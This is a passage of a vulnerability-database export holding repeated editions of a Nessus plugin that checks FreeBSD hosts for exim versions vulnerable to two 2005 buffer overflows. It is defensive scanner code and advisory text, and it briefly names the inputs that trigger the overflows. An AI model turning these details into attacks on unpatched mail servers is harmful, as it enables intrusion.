"published"}, {"hash": "a465375bd0bb0c7e72e35caa1f150831", "key": "description"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "09cd0998f21b6811e8f5438ddcb628f2", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}, {"hash": "55b5f288c0c073cab7832e1f46b617e7", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2019-01-16T20:06:13", "modified": "2018-11-23T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.3", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["https://marc.info/?l=bugtraq&m=110573573800377", "http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?60fdf1ac"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/23 12:49:57\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. 
The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # https://vuxml.freebsd.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60fdf1ac\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 8, "lastseen": "2019-01-16T20:06:13"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. 
The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 2, "enchantments": {}, "hash": "50faaf8e0845e75d760b93b942ea8f104c7d7030add8a85a58222b382d9c817f", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "d4e7b139ddbea34a2d42ac93ee7d2776", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "modified"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "31dea9af1907301899091b16d13e9400", "key": "references"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2016-12-09T05:37:29", "modified": "2016-12-08T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.2", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?cdbdb4e3", "http://marc.info/?l=bugtraq&m=110573573800377"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2016 Jacques Vidrine and 
contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"$Revision: 1.17 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:42:12 $\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. 
The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # http://www.freebsd.org/ports/portaudit/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdbdb4e3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2016 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["cpe"], "edition": 2, "lastseen": "2016-12-09T05:37:29"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. 
The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ce6c77754f241a397e5d44de94decf8e2a0d0184b56b6b00eebebbf31607793d", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "b09dad3a1a106eb7ecf8cc564c192cdc", "key": "cpe"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "d4e7b139ddbea34a2d42ac93ee7d2776", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "modified"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "31dea9af1907301899091b16d13e9400", "key": "references"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2018-09-02T00:04:23", "modified": "2016-12-08T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.3", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?cdbdb4e3", "http://marc.info/?l=bugtraq&m=110573573800377"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, 
Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2016 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"$Revision: 1.17 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:42:12 $\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. 
The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # http://www.freebsd.org/ports/portaudit/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdbdb4e3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2016 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": "2018-09-02T00:04:23"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. 
The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 1, "hash": "7fb65d202fb1c28819bcff4ec9818a73806836c6ab0b9a371be8daa946888296", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "b540797a005019f00f860d4babc60dab", "key": "modified"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "e39e9975e39879e64809b73ac9d0e959", "key": "sourceData"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "31dea9af1907301899091b16d13e9400", "key": "references"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2016-09-26T17:26:09", "modified": "2013-06-22T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.2", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?cdbdb4e3", "http://marc.info/?l=bugtraq&m=110573573800377"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2013 Jacques Vidrine and contributors\n#\n# 
Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"$Revision: 1.16 $\");\n script_cvs_date(\"$Date: 2013/06/22 00:10:42 $\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n 
